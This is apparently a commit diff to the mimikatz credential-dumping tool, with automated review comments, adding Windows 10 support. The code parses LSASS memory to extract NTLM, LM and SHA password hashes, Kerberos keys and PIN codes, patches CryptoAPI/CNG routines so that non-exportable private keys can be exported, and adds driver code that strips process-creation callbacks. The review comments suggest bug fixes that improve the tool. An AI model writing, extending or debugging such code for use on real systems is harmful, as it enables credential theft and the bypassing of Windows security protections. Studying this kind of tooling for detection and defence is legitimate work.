Some fixes for mimidrv & crypto. Preparation for Windows 10.
parent
253c460938
commit
4e798859ba
|
@ -374,7 +374,7 @@ NTSTATUS kkll_m_notify_remove_process(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_B
|
|||
if(bufferIn && (szBufferIn == sizeof(PCREATE_PROCESS_NOTIFY_ROUTINE)))
|
||||
{
|
||||
status = PsSetCreateProcessNotifyRoutine(*(PCREATE_PROCESS_NOTIFY_ROUTINE *) bufferIn, TRUE);
|
||||
if(pPsSetCreateProcessNotifyRoutineEx)
|
||||
if(!NT_SUCCESS(status) && pPsSetCreateProcessNotifyRoutineEx)
|
||||
status = pPsSetCreateProcessNotifyRoutineEx(*(PCREATE_PROCESS_NOTIFY_ROUTINE_EX *) bufferIn, TRUE);
|
||||
|
||||
if(NT_SUCCESS(status))
|
||||
|
|
|
@ -78,13 +78,11 @@ PCWCHAR kuhl_m_kerberos_ticket_etype(LONG eType)
|
|||
switch(eType)
|
||||
{
|
||||
case KERB_ETYPE_NULL: type = L"null "; break;
|
||||
|
||||
case KERB_ETYPE_DES_PLAIN: type = L"des_plain "; break;
|
||||
case KERB_ETYPE_DES_CBC_CRC: type = L"des_cbc_crc "; break;
|
||||
case KERB_ETYPE_DES_CBC_MD4: type = L"des_cbc_md4 "; break;
|
||||
case KERB_ETYPE_DES_CBC_MD5: type = L"des_cbc_md5 "; break;
|
||||
case KERB_ETYPE_DES_CBC_MD5_NT: type = L"des_cbc_md5_nt "; break;
|
||||
|
||||
case KERB_ETYPE_RC4_PLAIN: type = L"rc4_plain "; break;
|
||||
case KERB_ETYPE_RC4_PLAIN2: type = L"rc4_plain2 "; break;
|
||||
case KERB_ETYPE_RC4_PLAIN_EXP: type = L"rc4_plain_exp "; break;
|
||||
|
@ -97,17 +95,46 @@ PCWCHAR kuhl_m_kerberos_ticket_etype(LONG eType)
|
|||
case KERB_ETYPE_RC4_PLAIN_OLD_EXP: type = L"rc4_plain_old_exp"; break;
|
||||
case KERB_ETYPE_RC4_HMAC_OLD: type = L"rc4_hmac_old "; break;
|
||||
case KERB_ETYPE_RC4_HMAC_OLD_EXP: type = L"rc4_hmac_old_exp "; break;
|
||||
|
||||
case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96_PLAIN: type = L"aes128_hmac_plain"; break;
|
||||
case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96_PLAIN: type = L"aes256_hmac_plain"; break;
|
||||
case KERB_ETYPE_AES128_CTS_HMAC_SHA1_96: type = L"aes128_hmac "; break;
|
||||
case KERB_ETYPE_AES256_CTS_HMAC_SHA1_96: type = L"aes256_hmac "; break;
|
||||
|
||||
default: type = L"unknow "; break;
|
||||
}
|
||||
return type;
|
||||
}
|
||||
|
||||
PCWCHAR kuhl_m_kerberos_ticket_ctype(LONG cType)
|
||||
{
|
||||
PCWCHAR type;
|
||||
switch(cType)
|
||||
{
|
||||
case KERB_CHECKSUM_NONE: type = L"none "; break;
|
||||
case KERB_CHECKSUM_CRC32: type = L"crc32 "; break;
|
||||
case KERB_CHECKSUM_MD4: type = L"md4 "; break;
|
||||
case KERB_CHECKSUM_KRB_DES_MAC: type = L"krb_des_mac "; break;
|
||||
case KERB_CHECKSUM_KRB_DES_MAC_K: type = L"krb_des_mac_k "; break;
|
||||
case KERB_CHECKSUM_MD5: type = L"md5 "; break;
|
||||
case KERB_CHECKSUM_MD5_DES: type = L"md5_des "; break;
|
||||
case KERB_CHECKSUM_SHA1_NEW: type = L"sha1_new "; break;
|
||||
case KERB_CHECKSUM_HMAC_SHA1_96_AES128: type = L"hmac_sha1_aes128 "; break;
|
||||
case KERB_CHECKSUM_HMAC_SHA1_96_AES256: type = L"hmac_sha1_aes256 "; break;
|
||||
case KERB_CHECKSUM_LM: type = L"lm "; break;
|
||||
case KERB_CHECKSUM_SHA1: type = L"sha1 "; break;
|
||||
case KERB_CHECKSUM_REAL_CRC32: type = L"real_crc32 "; break;
|
||||
case KERB_CHECKSUM_DES_MAC: type = L"dec_mac "; break;
|
||||
case KERB_CHECKSUM_DES_MAC_MD5: type = L"dec_mac_md5 "; break;
|
||||
case KERB_CHECKSUM_MD25: type = L"md25 "; break;
|
||||
case KERB_CHECKSUM_RC4_MD5: type = L"rc4_md5 "; break;
|
||||
case KERB_CHECKSUM_MD5_HMAC: type = L"md5_hmac "; break;
|
||||
case KERB_CHECKSUM_HMAC_MD5: type = L"hmac_md5 "; break;
|
||||
case KERB_CHECKSUM_HMAC_SHA1_96_AES128_Ki: type = L"hmac_sha1_aes128_ki"; break;
|
||||
case KERB_CHECKSUM_HMAC_SHA1_96_AES256_Ki: type = L"hmac_sha1_aes256_ki"; break;
|
||||
default: type = L"unknow "; break;
|
||||
}
|
||||
return type;
|
||||
}
|
||||
|
||||
void kuhl_m_kerberos_ticket_freeTicket(PKIWI_KERBEROS_TICKET ticket)
|
||||
{
|
||||
if(ticket)
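Review bot: The labels for `KERB_CHECKSUM_DES_MAC` and `KERB_CHECKSUM_DES_MAC_MD5` in the new kuhl_m_kerberos_ticket_ctype read `dec_mac`/`dec_mac_md5`, which looks like a typo for the DES MAC checksum types; suggest `case KERB_CHECKSUM_DES_MAC: type = L"des_mac "; break;` and `case KERB_CHECKSUM_DES_MAC_MD5: type = L"des_mac_md5 "; break;`. The other labels are space-padded to a fixed display width, but `hmac_sha1_aes128_ki` and `hmac_sha1_aes256_ki` are not, so the output column shifts for those two values. The `unknow` default carries over the existing typo from kuhl_m_kerberos_ticket_etype; fixing both functions together keeps the output consistent.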
|
||||
|
@ -165,7 +192,7 @@ void kuhl_m_kerberos_ticket_freeKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBuffer
|
|||
|
||||
PDIRTY_ASN1_SEQUENCE_EASY kuhl_m_kerberos_ticket_createAppTicket(PKIWI_KERBEROS_TICKET ticket)
|
||||
{
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_Ticket, Seq_Ticket/*, Ctx_Ticket*/;
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_Ticket, Seq_Ticket;
|
||||
UCHAR integer1 = KERBEROS_VERSION;
|
||||
|
||||
if(App_Ticket = KULL_M_ASN1_CREATE_APP(ID_APP_TICKET))
|
||||
|
@ -184,7 +211,7 @@ PDIRTY_ASN1_SEQUENCE_EASY kuhl_m_kerberos_ticket_createAppTicket(PKIWI_KERBEROS_
|
|||
|
||||
PDIRTY_ASN1_SEQUENCE_EASY kuhl_m_kerberos_ticket_createAppKrbCred(PKIWI_KERBEROS_TICKET ticket, BOOL valueIsTicket)
|
||||
{
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred, Seq_KrbCred/*, Ctx_KrbCred*/, Seq_Root, App_EncKrbCredPart, App_Ticket;
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred, Seq_KrbCred, Seq_Root, App_EncKrbCredPart, App_Ticket;
|
||||
UCHAR integer1;
|
||||
|
||||
if(App_KrbCred = KULL_M_ASN1_CREATE_APP(ID_APP_KRB_CRED))
|
||||
|
|
|
@ -104,6 +104,7 @@ void kuhl_m_kerberos_ticket_displayFlags(ULONG flags);
|
|||
void kuhl_m_kerberos_ticket_displayExternalName(IN LPCWSTR prefix, IN PKERB_EXTERNAL_NAME pExternalName, IN PUNICODE_STRING pDomain);
|
||||
BOOL kuhl_m_kerberos_ticket_isLongFilename(PKIWI_KERBEROS_TICKET ticket);
|
||||
PCWCHAR kuhl_m_kerberos_ticket_etype(LONG eType);
|
||||
PCWCHAR kuhl_m_kerberos_ticket_ctype(LONG cType);
|
||||
|
||||
void kuhl_m_kerberos_ticket_freeTicket(PKIWI_KERBEROS_TICKET ticket);
|
||||
PKERB_EXTERNAL_NAME kuhl_m_kerberos_ticket_copyExternalName(PKERB_EXTERNAL_NAME pName);
|
||||
|
|
|
@ -692,23 +692,19 @@ BYTE PATC_WALL_SPCryptExportKey_EXPORT[] = {0xeb};
|
|||
#ifdef _M_X64
|
||||
BYTE PTRN_WI60_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x0f, 0x85};
|
||||
BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x75};
|
||||
BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x43, 0x24, 0x02, 0x75};
|
||||
BYTE PTRN_WN10b_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x75};
|
||||
BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x46, 0x24, 0x02, 0x75};
|
||||
BYTE PATC_WI60_SPCryptExportKey_EXPORT[] = {0x90, 0xe9};
|
||||
KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WI60_SPCryptExportKey), PTRN_WI60_SPCryptExportKey}, {sizeof(PATC_WI60_SPCryptExportKey_EXPORT), PATC_WI60_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_SPCryptExportKey), PTRN_WIN8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10b, {sizeof(PTRN_WN10b_SPCryptExportKey), PTRN_WN10b_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x41, 0x20, 0x02, 0x75};
|
||||
BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x47, 0x1c, 0x02, 0x75};
|
||||
BYTE PTRN_WI10_SPCryptExportKey[] = {0xf6, 0x43, 0x1c, 0x02, 0x75};
|
||||
BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x43, 0x1c, 0x02, 0x75};
|
||||
KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_SPCryptExportKey), PTRN_WIN8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_SPCryptExportKey), PTRN_WI10_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#endif
|
||||
NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[])
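Review bot: The new Windows 10 pattern is named `PTRN_WN10b_SPCryptExportKey` under `_M_X64` but `PTRN_WI10_SPCryptExportKey` under `_M_IX86`, and the two CngReferences tables key them with `KULL_M_WIN_BUILD_10b` and `KULL_M_WIN_BUILD_10` respectively, so the same OS generation is selected at different build thresholds on the two architectures. If that is intentional, a trailing comment on each entry naming the build the bytes were taken from would make it reviewable; otherwise the names and build keys should agree across the two `#ifdef` arms. On the x64 side the `PTRN_WIN8_SPCryptExportKey` line that follows `PTRN_WN10b_SPCryptExportKey` carries the same byte sequence; with the +/- markers lost on this page it is not clear whether both are on the new side, which is worth checking since the table would then hold two identical signatures under different build keys.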
|
||||
|
|
|
@ -207,12 +207,12 @@ BOOL kuhl_m_sekurlsa_nt6_acquireKey(PKULL_M_MEMORY_ADDRESS aLsassMemory, PKUHL_M
|
|||
KIWI_BCRYPT_HANDLE_KEY hKey; PKIWI_HARD_KEY pHardKey;
|
||||
PVOID buffer; SIZE_T taille; LONG offset;
|
||||
|
||||
if(pOs->MinorVersion < 2)
|
||||
if(pOs->BuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
{
|
||||
taille = sizeof(KIWI_BCRYPT_KEY);
|
||||
offset = FIELD_OFFSET(KIWI_BCRYPT_KEY, hardkey);
|
||||
}
|
||||
else if(pOs->MinorVersion < 3)
|
||||
else if(pOs->BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
{
|
||||
taille = sizeof(KIWI_BCRYPT_KEY8);
|
||||
offset = FIELD_OFFSET(KIWI_BCRYPT_KEY8, hardkey);
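Review bot: Switching the dispatch from MinorVersion to BuildNumber leaves the final else branch, which lies outside this hunk, to cover every build from `KULL_M_WIN_MIN_BUILD_BLUE` upward; since this commit also introduces `KULL_M_WIN_MIN_BUILD_10`, it is worth confirming that Windows 10 builds are meant to share the Blue path in kuhl_m_sekurlsa_nt6_acquireKey rather than get their own branch. A short comment above the first condition explaining why BuildNumber rather than MinorVersion now selects the layout would also help the next reader, because the two comparisons look equivalent at a glance. The function's body starts and ends outside the hunk.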
|
||||
|
|
|
@ -173,7 +173,7 @@ NTSTATUS kuhl_m_sekurlsa_acquireLSA()
|
|||
cLsass.osContext.MinorVersion = pInfos->MinorVersion;
|
||||
cLsass.osContext.BuildNumber = pInfos->BuildNumber;
|
||||
|
||||
if(isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION))
|
||||
if(isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION) && !(MIMIKATZ_NT_MAJOR_VERSION >= 6 && cLsass.osContext.MajorVersion == 10))
|
||||
PRINT_ERROR(L"Minidump pInfos->MajorVersion (%u) != MIMIKATZ_NT_MAJOR_VERSION (%u)\n", pInfos->MajorVersion, MIMIKATZ_NT_MAJOR_VERSION);
|
||||
#ifdef _M_X64
|
||||
else if(isError = (pInfos->ProcessorArchitecture != PROCESSOR_ARCHITECTURE_AMD64))
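Review bot: The relaxed check in kuhl_m_sekurlsa_acquireLSA still prints `Minidump pInfos->MajorVersion (%u) != MIMIKATZ_NT_MAJOR_VERSION (%u)` on failure, although a major version of 10 is now accepted when `MIMIKATZ_NT_MAJOR_VERSION >= 6`, so the message no longer states the rule that was actually applied. Folding the whole expression into the `if` assignment also makes the precedence hard to read; assigning first, `isError = (cLsass.osContext.MajorVersion != MIMIKATZ_NT_MAJOR_VERSION) && !(MIMIKATZ_NT_MAJOR_VERSION >= 6 && cLsass.osContext.MajorVersion == 10);` followed by `if(isError)`, keeps the later `else if` chain intact and lets the message be adjusted to mention the accepted versions. The function starts and ends outside this hunk.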
|
||||
|
@ -491,6 +491,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
UNICODE_STRING buffer;
|
||||
PVOID base;
|
||||
DWORD type, i;
|
||||
BOOL isNull = FALSE;
|
||||
|
||||
if(mesCreds)
|
||||
{
|
||||
|
@ -534,6 +535,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
|
||||
kprintf(L"\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
|
||||
kprintf(L"\n\t * Flags : %02x/N%02x/L%02x/S%02x/%02x/%02x/%02x/%02x", pPrimaryCreds10->isUnk0, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword, pPrimaryCreds10->isUnk1, pPrimaryCreds10->isUnk2, pPrimaryCreds10->isUnk3, pPrimaryCreds10->isUnk4);
|
||||
//kprintf(L"\n\t * Flags : %02x/N%02x/L%02x/S%02x/%02x/%02x", pPrimaryCreds10->isUnk0, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword, pPrimaryCreds10->isUnk1, pPrimaryCreds10->isUnk2);
|
||||
if(pPrimaryCreds10->isLmOwfPassword)
|
||||
{
|
||||
kprintf(L"\n\t * LM : ");
|
||||
|
@ -550,7 +552,12 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
kull_m_string_wprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
kprintf(L"\n\t * unknow : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->UnkStruct, 128, 0);
|
||||
for(i = 0; !isNull && (i < 128); i++)
|
||||
isNull |= !pPrimaryCreds10->UnkStruct[i];
|
||||
if(isNull)
|
||||
kprintf(L"[0..0]");
|
||||
else
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->UnkStruct, 128, 0);
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
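Review bot: The all-zero test on `UnkStruct` is inverted: `isNull` starts FALSE and the loop `for(i = 0; !isNull && (i < 128); i++) isNull |= !pPrimaryCreds10->UnkStruct[i];` stops and sets it TRUE at the first zero byte, so `[0..0]` is printed whenever any single byte is zero rather than when all 128 are. Initialising to TRUE and clearing on the first non-zero byte gives the intended meaning: `for(i = 0, isNull = TRUE; isNull && (i < sizeof(pPrimaryCreds10->UnkStruct)); i++) isNull = !pPrimaryCreds10->UnkStruct[i];`, which also replaces the duplicated literal 128 with the field's size. The WinDbg copy of kuhl_m_sekurlsa_genericCredsOutput further down (the `@ -237,6 +239,36 @@` hunk) has the same loop and needs the same fix. The enclosing switch and function start and end outside this hunk.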
|
||||
|
|
|
@ -30,8 +30,8 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
|||
BOOLEAN isShaOwPassword;
|
||||
BOOLEAN isUnk1;
|
||||
BOOLEAN isUnk2;
|
||||
BOOLEAN isUnk3;
|
||||
BOOLEAN isUnk4;
|
||||
BOOLEAN isUnk3; //
|
||||
BOOLEAN isUnk4; //
|
||||
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
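Review bot: The trailing `//` on `BOOLEAN isUnk3;` and `BOOLEAN isUnk4;` are empty comments that say nothing to the reader; either record what was observed for those two bytes or drop the markers so the struct does not look half-annotated.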
|
||||
|
|
|
@ -28,7 +28,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
|||
{
|
||||
dprintf("\n\t [%08x] %Z", credentials.AuthenticationPackageId, &primaryCredentials.Primary);
|
||||
if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE))
|
||||
flags = KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY;
|
||||
flags = (NtBuildNumber < KULL_M_WIN_BUILD_10b) ? KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY : KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10;
|
||||
else if(RtlEqualString(&primaryCredentials.Primary, &CREDENTIALKEYS_STRING, FALSE))
|
||||
flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
|
||||
else
|
||||
|
@ -48,34 +48,57 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
|||
}
|
||||
}
|
||||
|
||||
const KERB_INFOS kerbHelper[] = {
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pinCode),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_LOGON_SESSION),
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, pinCode),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_LOGON_SESSION_10),
|
||||
}
|
||||
};
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlobalLogonSessionTable, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_KERBEROS_LOGON_SESSION session;
|
||||
PBYTE data;
|
||||
UNICODE_STRING pinCode;
|
||||
KIWI_KERBEROS_KEYS_LIST_6 keyList;
|
||||
PKERB_HASHPASSWORD_6 pHashPassword;
|
||||
DWORD i;
|
||||
ULONG_PTR ptr;
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier), pData->LogonId))
|
||||
ULONG KerbOffsetIndex = (NtBuildNumber < KULL_M_WIN_BUILD_10b) ? 0 : 1;
|
||||
|
||||
if(ptr = kuhl_m_sekurlsa_utils_pFromAVLByLuid(pKerbGlobalLogonSessionTable, kerbHelper[KerbOffsetIndex].offsetLuid, pData->LogonId))
|
||||
{
|
||||
if(ReadMemory(ptr, &session, sizeof(KIWI_KERBEROS_LOGON_SESSION), NULL))
|
||||
if(data = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structSize))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput(&session.credentials, pData->LogonId, 0);
|
||||
if(session.pinCode)
|
||||
if(ReadMemory((ULONG_PTR) session.pinCode, &pinCode, sizeof(UNICODE_STRING), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
|
||||
if(session.pKeyList)
|
||||
if(ReadMemory((ULONG_PTR) session.pKeyList, &keyList, sizeof(KIWI_KERBEROS_KEYS_LIST_6) - sizeof(KERB_HASHPASSWORD_6), NULL))
|
||||
if(pHashPassword = (PKERB_HASHPASSWORD_6) LocalAlloc(LPTR, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6)))
|
||||
{
|
||||
if(ReadMemory((ULONG_PTR) session.pKeyList + sizeof(KIWI_KERBEROS_KEYS_LIST_6) - sizeof(KERB_HASHPASSWORD_6), pHashPassword, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6), NULL))
|
||||
if(ReadMemory(ptr, data, (ULONG) kerbHelper[KerbOffsetIndex].structSize, NULL))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (data + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, 0);
|
||||
if(*(PUNICODE_STRING *) (data + kerbHelper[KerbOffsetIndex].offsetPin))
|
||||
if(ReadMemory((ULONG_PTR) *(PUNICODE_STRING *) (data + kerbHelper[KerbOffsetIndex].offsetPin), &pinCode, sizeof(UNICODE_STRING), NULL))
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pinCode, pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE);
|
||||
if(*(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
if(ReadMemory((ULONG_PTR) *(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetKeyList), &keyList, sizeof(KIWI_KERBEROS_KEYS_LIST_6)/* - sizeof(KERB_HASHPASSWORD_6)*/, NULL))
|
||||
if(pHashPassword = (PKERB_HASHPASSWORD_6) LocalAlloc(LPTR, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6)))
|
||||
{
|
||||
dprintf("\n\t * Key List");
|
||||
for(i = 0; i < keyList.cbItem; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (pHashPassword + i), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST);
|
||||
if(ReadMemory((ULONG_PTR) *(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetKeyList) + sizeof(KIWI_KERBEROS_KEYS_LIST_6)/* - sizeof(KERB_HASHPASSWORD_6)*/, pHashPassword, keyList.cbItem * sizeof(KERB_HASHPASSWORD_6), NULL))
|
||||
{
|
||||
dprintf("\n\t * Key List");
|
||||
for(i = 0; i < keyList.cbItem; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (pHashPassword + i), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST);
|
||||
}
|
||||
LocalFree(pHashPassword);
|
||||
}
|
||||
LocalFree(pHashPassword);
|
||||
}
|
||||
}
|
||||
LocalFree(data);
|
||||
}
|
||||
}
|
||||
else dprintf("KO");
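Review bot: The rewritten kuhl_m_sekurlsa_enum_logon_callback_kerberos keeps commented-out arithmetic in both key-list reads, `sizeof(KIWI_KERBEROS_KEYS_LIST_6)/* - sizeof(KERB_HASHPASSWORD_6)*/`; now that the header comments out `KeysEntries[ANYSIZE_ARRAY]` in KIWI_KERBEROS_KEYS_LIST_6 (the `@ -72,11 +92,10 @@` hunk), the struct's sizeof is already the header size, so the residue should be deleted in both places, and the header member removed outright with a comment noting that entries follow the header in memory rather than left as `//KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY];`. The `KIWI_KERBEROS_LOGON_SESSION session;` local at the top of the function appears unused once the session is read into `data`; if it survives on the new side it should go. `kerbHelper[]` would also benefit from a one-line comment stating that index 0 is the pre-10 layout and index 1 the `_10` layout, matching how `KerbOffsetIndex` is chosen from `NtBuildNumber`.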
|
||||
|
@ -210,13 +233,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN ULONG_PTR reserved,
|
|||
DWORD nbCred = 0;
|
||||
ULONG_PTR pCur, pRef;
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
|
||||
ULONG CredOffsetIndex;
|
||||
PBYTE buffer;
|
||||
|
||||
if(NtBuildNumber < KULL_M_WIN_BUILD_7)
|
||||
CredOffsetIndex = 0;
|
||||
else
|
||||
CredOffsetIndex = 1;
|
||||
ULONG CredOffsetIndex = (NtBuildNumber < KULL_M_WIN_BUILD_7) ? 0 : 1;
|
||||
|
||||
if(pData->pCredentialManager)
|
||||
{
|
||||
|
|
|
@ -25,7 +25,27 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
|
|||
BOOLEAN isLmOwfPassword;
|
||||
BOOLEAN isShaOwPassword;
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
|
||||
} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
|
||||
BOOLEAN isUnk0;
|
||||
BOOLEAN isNtOwfPassword;
|
||||
BOOLEAN isLmOwfPassword;
|
||||
BOOLEAN isShaOwPassword;
|
||||
BOOLEAN isUnk1;
|
||||
BOOLEAN isUnk2;
|
||||
BOOLEAN isUnk3;
|
||||
BOOLEAN isUnk4;
|
||||
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
BYTE UnkStruct[128];
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10, *PMSV1_0_PRIMARY_CREDENTIAL_10;
|
||||
|
||||
typedef struct _RPCE_COMMON_TYPE_HEADER {
|
||||
UCHAR Version;
|
||||
|
@ -72,11 +92,10 @@ typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
|
|||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PVOID unk4;
|
||||
KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY];
|
||||
//KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY];
|
||||
} KIWI_KERBEROS_KEYS_LIST_6, *PKIWI_KERBEROS_KEYS_LIST_6;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
||||
{
|
||||
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
|
||||
ULONG UsageCount;
|
||||
LIST_ENTRY unk0;
|
||||
PVOID unk1;
|
||||
|
@ -105,7 +124,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
|||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PKIWI_KERBEROS_KEYS_LIST_6 pKeyList;
|
||||
PVOID pKeyList;
|
||||
PVOID unk23;
|
||||
LIST_ENTRY Tickets_1;
|
||||
FILETIME unk24;
|
||||
|
